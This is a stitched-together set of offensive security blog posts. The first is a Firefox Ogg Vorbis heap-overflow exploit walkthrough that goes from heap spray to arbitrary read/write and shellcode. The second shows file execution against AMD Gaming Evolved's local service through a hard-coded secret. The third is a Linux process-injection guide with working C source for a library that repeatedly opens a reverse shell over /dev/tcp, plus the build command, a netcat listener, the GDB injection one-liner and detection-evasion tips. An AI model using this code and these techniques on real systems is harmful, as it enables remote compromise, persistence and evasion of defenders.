byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag.
Following as VQ-relative structure:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits.
Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float.
All of above build a CodeBook structure.

3.2.3.2. Vorbis Time

In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero.

3.2.3.3. Vorbis Floor

In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure.

3.2.3.4. Vorbis Residue

In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook define which CodeBook will be used when decode this ResidueBackend.
MapBackend and Mode dose not have influence to exploit so we skip them too.

4. Patch analysis

4.1. Patched Function

From blog of ZDI, we can see vulnerability inside following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
if (book->used_entries > 0)
{
int i, j, entry;
float *t;

if (book->dim > 8)
{
for (i = 0; i < n;) {
entry = decode_packed_entry_number(book, b);
if (entry == -1) return (-1);
t = book->valuelist + entry * book->dim;
for (j = 0; j < book->dim;)
{
a[i++] += t[j++];
}
}
else
{
// blablabla
}
}
return (0);
}

Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue.

In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”.

4.2. Buffer – a

After read some source , I found “a” was initialization in below code:

    /* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;ichannels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm[i]).
And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header.
So we can control the size of memory chunk alloc for “a”.
Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap.

4.3. Buffer – t

After read some source code , I found book->valuelist get its value from here:

    c->valuelist=_book_unquantize(s,n,sortindex);

And the logic of _book_unquantize can be show as follow:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
long j, k, count = 0;
if (b->maptype == 1 || b->maptype == 2)
{
int quantvals;
float mindel = _float32_unpack(b->q_min);
float delta = _float32_unpack(b->q_delta);
float *r = _ogg_calloc(n * b->dim, sizeof(*r));

switch (b->maptype)
{
case 1:

quantvals=_book_maptype1_quantvals(b);

// do some math work

break;
case 2:

float val=b->quantlist[j*b->dim+k];

// do some math work

break;
}

return (r);
}
return (NULL);
}

So book->valuelist was the data decode from corresponding CodeBook’s VQ data.
It was lie on mozJemalloc heap too.

4.4. Cola Time

So now we can see, when the vulnerability was triggered:

  • a
    • lie on mozJemalloc heap;
    • size controllable.
  • t
    • lie on mozJemalloc heap too;
    • content controllable.
  • book->dim
    • content controllable.

Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content.
But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work.

5. mozJemalloc

mozJemalloc is a heap manager Mozilla develop base on Jemalloc.
Following was some global variables can show you some information about mozJemalloc.

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTress

In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region.
And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena.
There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin.
Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run.

5.2. Run

The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size.
When alloc region from a Run, it will return first No-in-use region close to Run header.

5.3. Arena Partition

This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1.
In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object.
In this situation, we can say that JavaScript Arena was isolated with other Arenas.
But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit.
First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux.

6. Exploit

In the section, I will show how to build a exploit base on this vulnerability.

6.1. Build Ogg file

First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow:

Pic.4 PoC Ogg file partial data
We can see codebook->dim equal to 0x48。

6.2. Heap Spary

First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin.
Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved.
If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data.
So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array.

6.3. Modify Array Length

After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap.
So we can force a memory layout as follow:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound.
Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally memory will like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those object and we can do:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory.
But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory.

6.5. Fake JSObject

We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable)

Pic.5 Fake JavaScript Object

If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can read/write to arbitrarily memory now.
After this, all you need was a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we achieve our shellcode, process context as follow:

Pic.6 achieve shellcode
Corresponding memory chunk information as follow:

Pic.7 memory address information

But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it.

7. Relative code and works

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi

 

AMD Gaming Evolved exploiting

Background

For anyone running an AMD GPU from a few years back, you’ve probably come across a piece of software installed on your computer from Raptr, Inc. If you don’t remember installing it, it’s because for several years it was installed silently along-side your AMD drivers. The software was marketed to the gaming community and labeled AMD Gaming Evolved. While I haven’t ever actually used the software, I’ve gathered that it allowed you to tweak your GPU as well as record your gameplay using another application called playstv.

I personally discovered the software while performing a routine check of what software running on my PC was listening for inbound connections. I try to make it a point to at least give a minimal amount of attention to any software I find accepting connections from outside of my PC. However, when I originally discovered this, my free time was scarce so I just made a note of it and uninstalled the software. The following screenshot shows the plays_service.exe binary listening on all interfaces on what appears to be an ephemeral port.

Fast forward two years, I update my AMD drivers and notice plays_service.exe” has shown up on my computer again. This time I decide to give it a little more attention.

Reversing – Windows Service

Opening up plays_service.exe in IDA, we see the usual boiler plate service code and trace it down to the main entry point. From here we almost immediately recognize that this application is python based and has been packaged with something like py2exe. While decompiling python byte code is rather trivial, the trick with these types of executables is identifying and locating the python classes. Python byte-code in a py2exe packaged binary is typically embedded in the executable or loaded from some relative path on disk. At this point, I usually open up the strings subview in IDA to see if anything obvious jumps out.

I see at least a few interesting string references that are worth investigating. Several of them look like they may have something to do with the initialization of python. The first string I track down is “Unable to create Python obj for executable name!” . At first glance it appears to be an error message if certain python objects aren’t created properly. Scrolling up in the function it references, I see the following code.

This function appears to be the python setup routine. Returning to my list of strings, I see several references to zip.

%s%cpython%d%d.zip
zipimport
cannot import zipimport module
zipimporter

I decided to search through the install directory and see if there were any zip files present. Success, only one zip file exists and it is named python35.zip! It’s filename also matches the format string of one of the string references above. I unzip the file and peruse its contents. The zip file contains thousands of compiled bytecode python files which I presume to be the applications core source code and library dependencies.

Reversing – Compiled Python

Looking through the compiled python files, I see three that may be the service’s source code.

I decompiled each of the files using uncompyle6 and opened them up in a text editor. The largest of the three, plays_service.pyc, turned out to be the main service source. The service is a basic HTTP server made up of a few simple classes. It binds to an ephermal port on startup and writes the port to the registry to be used by the greater application. The POST request handler code is listed below.

The handler expects a JSON formatted POST request with a couple of parameters. The first is the data parameter which holds the command to be processed. The second is a hash value of the data provided and a secret key. Lucky for us, the secret key just so happens to be hard-coded in the class definition. If the computed hash matches the one provided, the handler calls one of two defined command function, “extract_files” or “execute_installer”. From here I began to look at the “execute_installer” function because the name sounded quite promising.

The function logic is pretty straight forward. It performs a couple insignificant checks, resolves two paths passed as parameters to the POST request, and then calls CreateProcess. The most important detail of note is that while it looks like a fully controlled command injection is possible, the calls to win32api.GetShortPathName throw an exception if the parameter passed does not resolve to a file. This limits the exploitation of this vulnerability significantly but still allows for privilege escalation to SYSTEM and remote compromise using anonymous outbound SMB.

Exploit

Exploiting this “feature” for file execution didn’t take a significant amount of work. The only real requirements were properly setting up the POST request and hashing the right portion of data. A proof of concept for achieving file execution with this vulnerability (CVE-2018-6546) can be found here.

Process Injection with GDB

Inspired by excellent CobaltStrike training, I set out to work out an easy way to inject into processes in Linux. There’s been quite a lot of experimentation with this already, usually using ptrace(2) orLD_PRELOAD, but I wanted something a little simpler and less error-prone, perhaps trading ease-of-use for flexibility and works-everywhere. Enter GDB and shared object files (i.e. libraries).

GDB, for those who’ve never found themselves with a bug unsolvable with lots of well-placed printf("Here\n") statements, is the GNU debugger. It’s typical use is to poke at a runnnig process for debugging, but it has one interesting feature: it can have the debugged process call library functions. There are two functions which we can use to load a library into to the program: dlopen(3)from libdl, and __libc_dlopen_mode, libc’s implementation. We’ll use __libc_dlopen_mode because it doesn’t require the host process to have libdl linked in.

In principle, we could load our library and have GDB call one of its functions. Easier than that is to have the library’s constructor function do whatever we would have done manually in another thread, to keep the amount of time the process is stopped to a minimum. More below.

Caveats

Trading flexibility for ease-of-use puts a few restrictions on where and how we can inject our own code. In practice, this isn’t a problem, but there are a few gotchas to consider.

ptrace(2)

We’ll need to be able to attach to the process with ptrace(2), which GDB uses under the hood. Root can usually do this, but as a user, we can only attach to our own processes. To make it harder, some systems only allow processes to attach to their children, which can be changed via a sysctl. Changing the sysctl requires root, so it’s not very useful in practice. Just in case:

sysctl kernel.yama.ptrace_scope=0
# or
echo 0 > /proc/sys/kernel/yama/ptrace_scope

Generally, it’s better to do this as root.

Stopped Processes

When GDB attaches to a process, the process is stopped. It’s best to script GDB’s actions beforehand, either with -x and --batch or echoing commands to GDB minimize the amount of time the process isn’t doing whatever it should be doing. If, for whatever reason, GDB doesn’t restart the process when it exits, sending the process SIGCONT should do the trick.

kill -CONT <PID>

Process Death

Once our library’s loaded and running, anything that goes wrong with it (e.g. segfaults) affects the entire process. Likewise, if it writes output or sends messages to syslog, they’ll show up as coming from the process. It’s not a bad idea to use the injected library as a loader to spawn actual malware in new proceses.

On Target

With all of that in mind, let’s look at how to do it. We’ll assume ssh access to a target, though in principle this can (should) all be scripted and can be run with shell/sql/file injection or whatever other method.

Process Selection

First step is to find a process into which to inject. Let’s look at a process listing, less kernel threads:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# ps -fxo pid,user,args | egrep -v ' \[\S+\]$'
  PID USER     COMMAND
    1 root     /sbin/init
  625 root     /lib/systemd/systemd-journald
  664 root     /sbin/lvmetad -f
  696 root     /lib/systemd/systemd-udevd
 1266 root     /sbin/iscsid
 1267 root     /sbin/iscsid
 1273 root     /usr/lib/accountsservice/accounts-daemon
 1278 root     /usr/sbin/sshd -D
 1447 root      \_ sshd: root@pts/1
 1520 root          \_ -bash
 1538 root              \_ ps -fxo pid,user,args
 1539 root              \_ grep -E --color=auto -v  \[\S+\]$
 1282 root     /lib/systemd/systemd-logind
 1295 root     /usr/bin/lxcfs /var/lib/lxcfs/
 1298 root     /usr/sbin/acpid
 1312 root     /usr/sbin/cron -f
 1316 root     /usr/lib/snapd/snapd
 1356 root     /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
 1358 root     /usr/lib/policykit-1/polkitd --no-debug
 1413 root     /sbin/agetty --keep-baud 115200 38400 9600 ttyS0 vt220
 1415 root     /sbin/agetty --noclear tty1 linux
 1449 root     /lib/systemd/systemd --user
 1451 root      \_ (sd-pam)

Some good choices in there. Ideally we’ll use a long-running process which nobody’s going to want to kill. Processes with low pids tend to work nicely, as they’re started early and nobody wants to find out what happens when they die. It’s helpful to inject into something running as root to avoid having to worry about permissions. Even better is a process that nobody wants to kill but which isn’t doing anything useful anyway.

In some cases, something short-lived, killable, and running as a user is good if the injected code only needs to run for a short time (e.g. something to survey the box, grab creds, and leave) or if there’s a good chance it’ll need to be stopped the hard way. It’s a judgement call.

We’ll use 664 root /sbin/lvmetad -f. It should be able to do anything we’d like and if something goes wrong we can restart it, probably without too much fuss.

Malware

More or less any linux shared object file can be injected. We’ll make a small one for demonstration purposes, but I’ve injected multi-megabyte backdoors written in Go as well. A lot of the fiddling that went into making this blog post was done using pcapknock.

For the sake of simplicity, we’ll use the following. Note that a lot of error handling has been elided for brevity. In practice, getting meaningful error output from injected libraries’ constructor functions isn’t as straightforward as a simple warn("something"); return; unless you really trust the standard error of your victim process.

#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define SLEEP  120                    /* Time to sleep between callbacks */
#define CBADDR "<REDACTED>"           /* Callback address */
#define CBPORT "4444"                 /* Callback port */

/* Reverse shell command */
#define CMD "echo 'exec >&/dev/tcp/"\
            CBADDR "/" CBPORT "; exec 0>&1' | /bin/bash"

void *callback(void *a);

__attribute__((constructor)) /* Run this function on library load */
void start_callbacks(){
        pthread_t tid;
        pthread_attr_t attr;

        /* Start thread detached */
        if (-1 == pthread_attr_init(&attr)) {
                return;
        }
        if (-1 == pthread_attr_setdetachstate(&attr,
                                PTHREAD_CREATE_DETACHED)) {
                return;
        }

        /* Spawn a thread to do the real work */
        pthread_create(&tid, &attr, callback, NULL);
}

/* callback tries to spawn a reverse shell every so often.  */
void *
callback(void *a)
{
        for (;;) {
                /* Try to spawn a reverse shell */
                system(CMD);
                /* Wait until next shell */
                sleep(SLEEP);
        }
        return NULL;
}

In a nutshell, this will spawn an unencrypted, unauthenticated reverse shell to a hardcoded address and port every couple of minutes. The __attribute__((constructor)) applied to start_callbacks() causes it to run when the library is loaded. All start_callbacks() does is spawn a thread to make reverse shells.

Building a library is similar to building any C program, except that -fPIC and -shared must be given to the compiler.

cc -O2 -fPIC -o libcallback.so ./callback.c -lpthread -shared

It’s not a bad idea to optimize the output with -O2 to maybe consume less CPU time. Of course, on a real engagement the injected library will be significantly more complex than this example.

Injection

Now that we have the injectable library created, we can do the deed. First thing to do is start a listener to catch the callbacks:

nc -nvl 4444 #OpenBSD netcat ftw!

__libc_dlopen_mode takes two arguments, the path to the library and flags as an integer. The path to the library will be visible, so it’s best to put it somewhere inconspicuous, like /usr/lib. We’ll use 2 for the flags, which corresponds to dlopen(3)’s RTLD_NOW. To get GDB to cause the process to run the function, we’ll use GDB’s print command, which conviently gives us the function’s return value. Instead of typing the command into GDB, which takes eons in program time, we’ll echo it into GDB’s standard input. This has the nice side-effect of causing GDB to exit without needing a quitcommand.

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# echo 'print __libc_dlopen_mode("/root/libcallback.so", 2)' | gdb -p 664
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
...snip...
0x00007f6ca1cf75d3 in select () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) [New Thread 0x7f6c9bfff700 (LWP 1590)]
$1 = 312536496
(gdb) quit
A debugging session is active.

        Inferior 1 [process 664] will be detached.

Quit anyway? (y or n) [answered Y; input not from terminal]
Detaching from program: /sbin/lvmetad, process 664

Checking netcat, we’ve caught the callback:

[stuart@c2server:/home/stuart]
$ nc -nvl 4444
Connection from <REDACTED> 50184 received!
ps -fxo pid,user,args
...snip...
  664 root     /sbin/lvmetad -f
 1591 root      \_ sh -c echo 'exec >&/dev/tcp/<REDACTED>/4444; exec 0>&1' | /bin/bash
 1593 root          \_ /bin/bash
 1620 root              \_ ps -fxo pid,user,args
...snip...

That’s it, we’ve got execution in another process.

If the injection had failed, we’d have seen $1 = 0, indicating__libc_dlopen_mode returned NULL.

Artifacts

There are several places defenders might catch us. The risk of detection can be minimized to a certain extent, but without a rootkit, there’s always some way to see we’ve done something. Of course, the best way to hide is to not raise suspicions in the first place.

Process listing

A process listing like the one above will show that the process into which we’ve injected malware has funny child processes. This can be avoided by either having the library doule-fork a child process to do the actual work or having the injected library do everything from within the victim process.

Files on disk

The loaded library has to start on disk, which leaves disk artifacts, and the original path to the library is visible in /proc/pid/maps:

root@ubuntu-s-1vcpu-1gb-nyc1-01:~# cat /proc/664/maps                                                      
...snip...
7f6ca0650000-7f6ca0651000 r-xp 00000000 fd:01 61077    /root/libcallback.so                        
7f6ca0651000-7f6ca0850000 ---p 00001000 fd:01 61077    /root/libcallback.so                        
7f6ca0850000-7f6ca0851000 r--p 00000000 fd:01 61077    /root/libcallback.so
7f6ca0851000-7f6ca0852000 rw-p 00001000 fd:01 61077    /root/libcallback.so            
...snip...

If we delete the library, (deleted) is appended to the filename (i.e./root/libcallback.so (deleted)), which looks even weirder. This is somewhat mitigated by putting the library somewhere libraries normally live, like /usr/lib, and naming it something normal-looking.

Service disruption

Loading the library stops the running process for a short amount of time, and if the library causes process instability, it may crash the process or at least cause it to log warning messages (on a related note, don’t inject into systemd(1), it causes segfaults and makes shutdown(8) hang the box).

Process injection on Linux is reasonably easy:

  1. Write a library (shared object file) with a constructor.
  2. Load it with echo 'print __libc_dlopen_mode("/path/to/library.so", 2)' | gdb -p <PID>